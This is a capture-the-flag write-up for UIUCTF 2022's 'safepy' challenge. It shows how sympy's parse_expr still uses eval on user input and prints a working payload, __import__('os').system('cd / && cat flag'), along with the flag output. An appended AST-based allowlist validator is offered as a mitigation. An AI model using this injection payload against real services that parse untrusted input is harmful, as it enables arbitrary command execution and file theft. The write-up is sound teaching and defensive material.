
UIUCTF 2022

rev/safepy

Description: godlike snake with a nebula behind it and math equations floating around it

challenge file

Given Python script:

```python
from sympy import *


def parse(expr):
    # learned from our mistake... let's be safe now
    # https://stackoverflow.com/questions/33606667/from-string-to-sympy-expression
    # return sympify(expr)

    # https://docs.sympy.org/latest/modules/parsing.html
    return parse_expr(expr)


print('Welcome to the derivative (with respect to x) solver!')
user_input = input('Your expression: ')
expr = parse(user_input)
deriv = diff(expr, Symbol('x'))
print('The derivative of your expression is:')
print(deriv)
```

This GitHub issue shows the vulnerability in parse_expr: under the hood it still hands the string to Python's eval, so swapping sympify for parse_expr does not remove the code execution.

vulnerable explanation

Payload:

```python
__import__("os").system("cd / && cat flag")
```

Output:

```
== proof-of-work: disabled ==
Welcome to the derivative (with respect to x) solver!
Your expression: __import__("os").system("cd / && cat flag")
uiuctf{na1v3_0r_mal1ci0u5_chang3?}

The derivative of your expression is:
0
```

Flag: uiuctf{na1v3_0r_mal1ci0u5_chang3?}
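Added here as an illustration (not part of the original writeup or the challenge code): a stdlib-only allowlist check that runs on the user string before it is handed to parse_expr, rejecting the payload above while letting ordinary arithmetic through. The set of permitted function names is an assumption about what a derivative solver needs; sympy itself is not imported, so the snippet runs without it.

```python
import ast

# Assumption: the function names a derivative solver should accept.
ALLOWED_FUNCS = {"sin", "cos", "tan", "exp", "log", "sqrt"}

# Only these AST node types may appear anywhere in the expression tree.
# Attribute access (the .system in the payload), subscripts, lambdas,
# comprehensions, strings and keyword arguments are all absent, so they fail.
ALLOWED_NODES = (
    ast.Expression, ast.BinOp, ast.UnaryOp, ast.Constant, ast.Name, ast.Call,
    ast.Add, ast.Sub, ast.Mult, ast.Div, ast.Pow, ast.USub, ast.UAdd, ast.Load,
)


def validate_math_expr(src: str) -> str:
    """Return src unchanged if it is plain arithmetic, else raise ValueError."""
    try:
        tree = ast.parse(src, mode="eval")
    except SyntaxError as exc:
        raise ValueError(f"not an expression: {exc.msg}") from None
    for node in ast.walk(tree):
        if not isinstance(node, ALLOWED_NODES):
            raise ValueError(f"disallowed syntax: {type(node).__name__}")
        if isinstance(node, ast.Constant):
            # Reject strings, bytes, bools, None: only plain numbers are literals.
            if isinstance(node.value, bool) or not isinstance(node.value, (int, float)):
                raise ValueError("only numeric literals are allowed")
        if isinstance(node, ast.Name) and node.id.startswith("_"):
            # Blocks __import__, __builtins__ and similar dunder names outright.
            raise ValueError(f"disallowed name: {node.id}")
        if isinstance(node, ast.Call):
            if not (isinstance(node.func, ast.Name) and node.func.id in ALLOWED_FUNCS):
                raise ValueError("only allow-listed function calls are permitted")
            if node.keywords:
                raise ValueError("keyword arguments are not allowed")
    return src


def is_safe_math_expr(src: str) -> bool:
    """Convenience wrapper: True if validate_math_expr accepts the string."""
    try:
        validate_math_expr(src)
        return True
    except ValueError:
        return False
```

Only a string that passes validate_math_expr should reach sympy's parse_expr; the eval inside it is then confined to arithmetic over names and the allow-listed functions.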

This post is licensed under CC BY 4.0 by the author.